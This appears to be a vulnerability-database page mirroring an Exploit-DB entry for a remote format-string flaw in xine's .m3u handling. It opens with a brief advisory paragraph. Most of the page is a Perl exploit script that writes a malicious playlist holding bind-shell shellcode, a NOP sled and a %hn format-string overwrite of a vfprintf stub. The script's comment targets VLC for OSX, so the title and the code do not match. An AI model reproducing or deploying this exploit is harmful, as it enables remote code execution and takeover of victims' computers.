Xine 0.99.4 - '.m3u' Remote Format String

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056130 漏洞类型
发布时间 2007-01-03 更新时间 2007-01-03
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/29527
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/22252/info

The 'xine' program is prone to a remote format-string vulnerability because the application fails to properly sanitize user-supplied input before including it in the format-specifier argument of a formatted-printing function.

Successfully exploiting this issue allows remote attackers to execute arbitrary machine code in the context of the application and to compromise affected computers.

This issue may be related to the vulnerability discussed in BID 21852 (VideoLan VLC Media Player Remote Format String Vulnerability); this has not been confirmed. 

#!/usr/bin/perl
#
# http://www.digitalmunition.com/VLCMediaSlayer-x86.pl
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# This exploit will create a malicious .m3u file that will cause VLC 
Player for OSX to execute arbitrary code.
#

$outfile = "pwnage.m3u";

$bindshell =
"\x6a\x42\x58\xcd\x80\x6a\x61\x58\x99\x52\x68\x10\x02\x11\x5c\x89" .
"\xe1\x52\x42\x52\x42\x52\x6a\x10\xcd\x80\x99\x93\x51\x53\x52\x6a" .
"\x68\x58\xcd\x80\xb0\x6a\xcd\x80\x52\x53\x52\xb0\x1e\xcd\x80\x97" .
"\x6a\x02\x59\x6a\x5a\x58\x51\x57\x51\xcd\x80\x49\x0f\x89\xf1\xff" .
"\xff\xff\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50" .
"\x54\x54\x53\x53\xb0\x3b\xcd\x80";

# MALLOC                 02800000-03008000 [ 8224K] rw-/rwx SM=COW  
...e_0x1300000
# Pattern found @ 0x298589e
# Pattern found @ 0x298ba92

$jmpaddr = 0x41424344;

$lo = ($jmpaddr >> 0) & 0xffff;
$hi = ($jmpaddr >> 16) & 0xffff;

printf "jump address is: 0x%x%x\n", $hi, $lo;

$format = "%25" . ($lo-0x24) . "d" . "%25" . "23" . "%24" . "hn" . "%25" 
. ($hi-$lo) . "d" . "%25" . "24" . "%24" . "hn" ;

$writeaddr = 0xa0011393 ; # <dyld_stub___vfprintf>

printf "writing to file: %s\n", $outfile;
open(PWNED,">$outfile");

print PWNED "#EXTM3U\n" . "#EXTINF:0,1-07 " . "\x90" x 50 . $bindshell . 
"\n" .
"udp://--" . pack('l', $writeaddr+2) . pack('l', $writeaddr) .
$format . "i" x (999 - length("Can't get file status for ") ) . "\n";

close(PWNED);